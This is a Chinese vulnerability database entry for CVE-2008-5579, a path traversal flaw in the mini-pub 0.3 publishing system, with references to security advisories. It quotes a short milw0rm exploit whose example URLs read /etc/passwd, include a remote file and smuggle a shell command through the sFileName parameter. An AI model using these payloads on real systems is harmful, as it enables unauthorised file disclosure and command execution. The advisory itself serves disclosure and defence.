mini-pub 0.3 mini-pub.php/front-end/cat.php绝对路径遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116392 漏洞类型 路径遍历
发布时间 2008-10-12 更新时间 2009-01-29
CVE编号 CVE-2008-5579 CNNVD-ID CNNVD-200812-264
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/6733
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-264
|漏洞详情
mini-pub是一款轻量级的出版系统。mini-pub0.3版本的mini-pub.php/front-end/cat.php中存在的绝对路径遍历历漏洞。远程攻击者可以借助sFileName参数中的一个全路径名,读取任意文件。
|漏洞EXP
mini-pub 0.3 multiple vulnerabilities

download   http://sourceforge.net/projects/mini-pub/

author     muuratsalo
contact    muuratsalo[at]gmail.com

exploits
1. local file disclosure
http://localhost/mini-pub.php/front-end/img.php?sFileName=http://site.com/cmd.txt?

2. local file disclosure
http://localhost/mini-pub.php/front-end/cat.php?sFileName=/etc/passwd

3. command execution
http://localhost/mini-pub.php/front-end/cat.php?sFileName=a%3Benv

# milw0rm.com [2008-10-12]
|参考资料

来源:BID
名称:27671
链接:http://www.securityfocus.com/bid/27671
来源:BUGTRAQ
名称:20080207mini-pub0.3multiplevulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/487695/100/200/threaded
来源:MILW0RM
名称:6733
链接:http://www.milw0rm.com/exploits/6733
来源:SREASON
名称:4733
链接:http://securityreason.com/securityalert/4733